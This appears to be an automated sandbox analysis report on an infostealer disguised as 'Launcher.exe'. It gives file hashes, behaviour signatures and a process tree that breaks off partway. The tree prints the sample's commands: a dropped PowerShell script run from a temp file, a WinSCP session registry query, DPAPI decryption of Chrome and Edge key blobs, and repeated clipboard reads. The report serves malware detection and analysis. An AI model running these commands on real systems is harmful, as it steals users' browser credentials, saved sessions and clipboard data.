Resubmissions

25/08/2024, 22:47

240825-2qmdbszane 9

25/08/2024, 21:26

240825-1aeswawbqd 9

25/08/2024, 21:12

240825-z2j18sxajm 9

25/08/2024, 19:29

240825-x7bwpssdkp 9

Analysis

  • max time kernel
    36s
  • max time network
    42s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/08/2024, 19:29

General

  • Target

    Launcher.exe

  • Size

    56.9MB

  • MD5

    b3670f482f26691a50a85376ddde32ad

  • SHA1

    48b5c319abdf25365f3613893139f4f5c2f011f5

  • SHA256

    c67dc6e962a28b421cdff1b27d9efa4ba97c3d467f2e21766d168c66b971926b

  • SHA512

    fafbddb91a5df8642fc15260144cca71b3f7f244f25647ad5001f66f43dedd9feed0675650c5948e7070519f4a3318ecef4de04b12067a75f2005076f7311d7e

  • SSDEEP

    786432:WMguj8Q4VfvIqFTrY17OZvPvmPv1JPCl3wT3q0+Gra4pYZ0WMBGA6tBNB:WiAQIHIkH0AafrqXwYhAK

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 64 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
    "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1852
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "hostname"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1452
      • C:\Windows\system32\HOSTNAME.EXE
        hostname
        3⤵
          PID:4280
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\Admin\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4676
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Roaming\temp.ps1 "
          3⤵
            PID:3808
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -noprofile -
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4036
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\leryz0fn\leryz0fn.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4964
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB323.tmp" "c:\Users\Admin\AppData\Local\Temp\leryz0fn\CSCA9C2870764324F7B88990C03CFF159.TMP"
                5⤵
                  PID:2128
          • C:\Windows\system32\reg.exe
            C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
            2⤵
              PID:3088
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "tasklist"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:788
              • C:\Windows\system32\tasklist.exe
                tasklist
                3⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:1416
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,234,18,87,2,183,105,141,71,155,28,60,142,1,144,212,95,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,16,147,125,207,125,109,229,7,6,13,224,36,123,209,239,57,239,178,28,21,162,38,169,79,25,96,38,243,169,251,12,147,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,198,9,120,107,169,46,192,142,15,226,155,27,120,63,61,44,56,40,48,202,223,82,248,208,219,203,51,180,136,214,196,232,48,0,0,0,34,37,60,125,169,138,31,155,5,193,68,2,83,178,24,46,245,17,11,209,43,6,182,231,87,88,212,215,182,140,234,20,73,109,71,229,173,159,220,88,183,215,140,225,1,45,121,112,64,0,0,0,175,251,26,158,198,206,238,119,189,167,221,201,156,244,76,197,120,131,136,189,243,32,244,220,23,148,92,43,112,137,68,171,116,91,44,67,209,253,234,169,27,231,187,129,81,127,102,209,33,46,240,130,186,10,209,1,161,30,155,103,199,242,37,23), $null, 'CurrentUser')"
              2⤵
              • An obfuscated cmd.exe command-line is typically used to evade detection.
              • Suspicious use of WriteProcessMemory
              PID:5096
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,234,18,87,2,183,105,141,71,155,28,60,142,1,144,212,95,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,16,147,125,207,125,109,229,7,6,13,224,36,123,209,239,57,239,178,28,21,162,38,169,79,25,96,38,243,169,251,12,147,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,198,9,120,107,169,46,192,142,15,226,155,27,120,63,61,44,56,40,48,202,223,82,248,208,219,203,51,180,136,214,196,232,48,0,0,0,34,37,60,125,169,138,31,155,5,193,68,2,83,178,24,46,245,17,11,209,43,6,182,231,87,88,212,215,182,140,234,20,73,109,71,229,173,159,220,88,183,215,140,225,1,45,121,112,64,0,0,0,175,251,26,158,198,206,238,119,189,167,221,201,156,244,76,197,120,131,136,189,243,32,244,220,23,148,92,43,112,137,68,171,116,91,44,67,209,253,234,169,27,231,187,129,81,127,102,209,33,46,240,130,186,10,209,1,161,30,155,103,199,242,37,23), $null, 'CurrentUser')
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1436
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,234,18,87,2,183,105,141,71,155,28,60,142,1,144,212,95,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,16,153,136,173,28,160,11,192,101,100,152,247,55,111,174,75,219,192,3,10,58,60,135,240,108,53,249,27,170,118,80,46,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,7,24,147,157,117,69,140,248,5,240,80,22,178,152,145,102,105,162,202,127,125,154,185,121,205,242,52,5,2,138,189,48,0,0,0,60,102,236,48,234,65,113,119,153,34,37,105,144,202,242,93,179,118,234,149,67,6,174,138,50,232,99,235,44,226,176,93,238,217,192,201,28,160,51,106,13,65,162,200,140,25,101,85,64,0,0,0,109,58,151,240,115,93,172,132,207,57,101,201,223,221,222,91,103,171,55,199,98,220,224,58,206,223,93,141,129,29,163,51,180,95,130,238,125,50,113,39,34,26,51,116,117,84,75,132,68,33,107,72,96,79,225,159,15,122,244,54,166,42,226,97), $null, 'CurrentUser')"
              2⤵
              • An obfuscated cmd.exe command-line is typically used to evade detection.
              • Suspicious use of WriteProcessMemory
              PID:2380
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,234,18,87,2,183,105,141,71,155,28,60,142,1,144,212,95,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,16,153,136,173,28,160,11,192,101,100,152,247,55,111,174,75,219,192,3,10,58,60,135,240,108,53,249,27,170,118,80,46,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,7,24,147,157,117,69,140,248,5,240,80,22,178,152,145,102,105,162,202,127,125,154,185,121,205,242,52,5,2,138,189,48,0,0,0,60,102,236,48,234,65,113,119,153,34,37,105,144,202,242,93,179,118,234,149,67,6,174,138,50,232,99,235,44,226,176,93,238,217,192,201,28,160,51,106,13,65,162,200,140,25,101,85,64,0,0,0,109,58,151,240,115,93,172,132,207,57,101,201,223,221,222,91,103,171,55,199,98,220,224,58,206,223,93,141,129,29,163,51,180,95,130,238,125,50,113,39,34,26,51,116,117,84,75,132,68,33,107,72,96,79,225,159,15,122,244,54,166,42,226,97), $null, 'CurrentUser')
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4300
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3964
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4296
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3748
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4236
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4552
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1840
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:8
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3460
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1444
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1456
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4424
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4428
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3024
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2840
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4404
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4904
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2412
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2232
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
              2⤵
                PID:3504
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  3⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3132
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                2⤵
                • Clipboard Data
                PID:5000
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  3⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4176
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                2⤵
                  PID:2316
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    3⤵
                    • Clipboard Data
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3084
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                  2⤵
                    PID:3400
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Get-Clipboard
                      3⤵
                      • Clipboard Data
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1340
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                    2⤵
                      PID:4652
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell Get-Clipboard
                        3⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1220
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                      2⤵
                        PID:4428
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell Get-Clipboard
                          3⤵
                          • Clipboard Data
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:864
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                        2⤵
                          PID:2840
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell Get-Clipboard
                            3⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3024
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                          2⤵
                            PID:4904
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell Get-Clipboard
                              3⤵
                              • Clipboard Data
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4404
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                            2⤵
                            • Clipboard Data
                            PID:3992
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell Get-Clipboard
                              3⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3228
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                            2⤵
                              PID:4608
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-Clipboard
                                3⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4412
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                              2⤵
                                PID:4176
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-Clipboard
                                  3⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5000
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                2⤵
                                • Clipboard Data
                                PID:2324
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-Clipboard
                                  3⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4604
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                2⤵
                                  PID:4704
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-Clipboard
                                    3⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2212
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                  2⤵
                                    PID:4308
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Get-Clipboard
                                      3⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4300
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                    2⤵
                                      PID:1912
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Get-Clipboard
                                        3⤵
                                        • Clipboard Data
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4260
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                      2⤵
                                        PID:4152
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-Clipboard
                                          3⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2028
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                        2⤵
                                        • Clipboard Data
                                        PID:4988
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-Clipboard
                                          3⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1016
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                        2⤵
                                          PID:1888
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-Clipboard
                                            3⤵
                                            • Clipboard Data
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4724
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                          2⤵
                                            PID:2944
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-Clipboard
                                              3⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:556
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                            2⤵
                                            • Clipboard Data
                                            PID:1416
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-Clipboard
                                              3⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5096
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                            2⤵
                                            • Clipboard Data
                                            PID:3660
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-Clipboard
                                              3⤵
                                              • Clipboard Data
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2452
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                            2⤵
                                            • Clipboard Data
                                            PID:864
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-Clipboard
                                              3⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3376
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                            2⤵
                                            • Clipboard Data
                                            PID:3584
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-Clipboard
                                              3⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1640
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                            2⤵
                                            • Clipboard Data
                                            PID:3116
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-Clipboard
                                              3⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2592
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                            2⤵
                                              PID:920
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell Get-Clipboard
                                                3⤵
                                                • Clipboard Data
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3548
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                              2⤵
                                                PID:3228
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-Clipboard
                                                  3⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2264
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                2⤵
                                                  PID:3012
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-Clipboard
                                                    3⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1692
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                  2⤵
                                                    PID:3748
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-Clipboard
                                                      3⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:116
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                    2⤵
                                                      PID:452
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-Clipboard
                                                        3⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:408
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                      2⤵
                                                        PID:4264
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-Clipboard
                                                          3⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2380
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                        2⤵
                                                          PID:2220
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-Clipboard
                                                            3⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1548
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                          2⤵
                                                          • Clipboard Data
                                                          PID:1184
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-Clipboard
                                                            3⤵
                                                            • Clipboard Data
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1704
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                          2⤵
                                                          • Clipboard Data
                                                          PID:208
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-Clipboard
                                                            3⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1108
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                          2⤵
                                                          • Clipboard Data
                                                          PID:2460
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-Clipboard
                                                            3⤵
                                                            • Clipboard Data
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4152
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                          2⤵
                                                            PID:3132
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-Clipboard
                                                              3⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3700
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                            2⤵
                                                              PID:4724
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-Clipboard
                                                                3⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4672
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                              2⤵
                                                                PID:4736
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-Clipboard
                                                                  3⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:748
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                2⤵
                                                                  PID:5096
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-Clipboard
                                                                    3⤵
                                                                    • Clipboard Data
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1536
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                  2⤵
                                                                    PID:1284
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-Clipboard
                                                                      3⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4304
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                    2⤵
                                                                      PID:3852
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-Clipboard
                                                                        3⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1712
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                      2⤵
                                                                        PID:4224
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Get-Clipboard
                                                                          3⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4904
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                        2⤵
                                                                          PID:2592
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell Get-Clipboard
                                                                            3⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3664
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                          2⤵
                                                                            PID:372
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-Clipboard
                                                                              3⤵
